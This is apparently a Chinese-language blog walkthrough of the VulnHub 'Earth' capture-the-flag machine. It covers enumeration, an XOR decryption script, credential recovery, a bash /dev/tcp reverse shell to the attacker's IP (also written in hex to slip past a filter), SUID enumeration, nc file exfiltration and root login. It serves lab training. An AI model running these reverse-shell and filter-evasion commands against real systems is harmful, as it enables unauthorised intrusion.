VulnHub靶机 | Earth

发布于 2022-10-13  193 次阅读 

 “我曾捡到过一束光,在日落时分还给了太阳”

复现过程

主机发现

端口探测

  • 修改hosts文件
  • 访问earth.local

目录扫描

  • 发现admin/login
  • 尝试爆破发现不行,继续目录扫描terratest.earth.local
  • 发现robots.txt
  • 最后一行有个testingnotes.*文件,尝试后发现为txt文件
  • 翻译过来

解密过程

  • 文中提到testdata.txt作为解密字典,先下载它
  • 编写python脚本进行异或
import binascii
testdata = binascii.b2a_hex(open('testdata.txt','rb').read()).decode()
for i in open('1.txt','r'):
    i = i.replace('\n','')
    print(hex(int(i,16) ^ int(testdata,16)))
  • 运行后输出结果为
0x4163636f7264696e6720746f20726164696f6d657472696320646174696e6720657374696d6174696f6e20616e64206f746865722065766964656e63652c20456172746820666f726d6564206f76657220342e352062696c6c696f6e2079656172732061676f2e2057697468696e207468652066697273742062696c6c696f6e207965617273206f66204561727468277320686973436679202f2f7d6f6d6f3b2f70706561726527327e643b7f662427782c7f6a6a3d2a616c66332c6f717c79247736267c25516a76772b55203c40663b792f6a7f6b72307e683c506a31732e3d066997f3dc732d712c3c6a247b75676e247536267f2a2b6f2765726c6a7c6d6e6e2f3f3b2d277f31252c667b6b78382e607f6229228ce5996e70607573742a797a64317d7862693a6f7b297e73687d2c5e3623546a637937616a2c796e3e4868752d17736b6c2924496e2a27792f6479626a377074347e7522743d356a6768262379782a2b6677693d2f65617079726e63616e786b797f382f6b3c0b363d2b3180e8da712a497238786f22507c377766626e
0x4163636f7264696e6720746f20726164696f6d657472696320646174696e6720657374696d6174696f6e20616e64206f746865722065766964656e63652c20456172746820666f726d6564206f76657220342e352062696c6c696f6e2079656172732061676f2e2057697468696e207468652066697273742062696c6c696f6e207965617273206f66204561727468277320686973746f72792c206c69666520617070656172656420696e20746865206f6365616e7320616e6420626567616e20746f2061666665637420456172746827732061746d6f73706865726520616e6420737572666163652c206c656164696e6720746f207468652070726f6c5e72726c6a7e3c6576797f7b262a786b7c68246b61772d6f6320302d2777656231343669716324687465376166236065637e296f3e6b466e6b756b7a64747c613e797e63697976627e6a6e24364f3f30697e7f647c30767c246c78347e25356c33642a606d783661387b76636b65746469612025652c7b747239783e717b3177246826767e6f6178782d296966347476367075646b
0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174
  • 对三串十六进制数字进行转文本处理,最后一段转义后是earthclimatechangebad4humans一直在循环
  • 使用账号:terra 密码:earthclimatechangebad4humans登陆成功

Getshell

  • 发现可以远程执行命令
  • 使用nc监听4444端口
  • 执行反弹shell命令
bash -i >& /dev/tcp/192.168.124.129/4444 0>&1
  • 没有反弹成功,可能是对ip地址进行过滤了,讲ip地址转换成16进制尝试
bash -i >& /dev/tcp/0Xc0a87c81/4444 0>&1
  • 反弹shell成功

提权

  • 尝试SUID提权
find / -perm -u=s -type f 2>/dev/null
  • 发现reset_root文件有点可疑,运行下
  • 发现运行不了,将文件传回攻击机
攻击机:nc -nlvp 5555 >reset_root
靶机shell:nc 192.168.124.129 5555 < /usr/bin/reset_root
  • 使用strace跟踪系统调用
  • 显示缺少三个文件或目录,使用shell创建一下
  • 再次运行reset_root

root权限

  • 直接登录root账号,密码为Earth

我从未觉得繁琐,说浪漫些,我很爱你。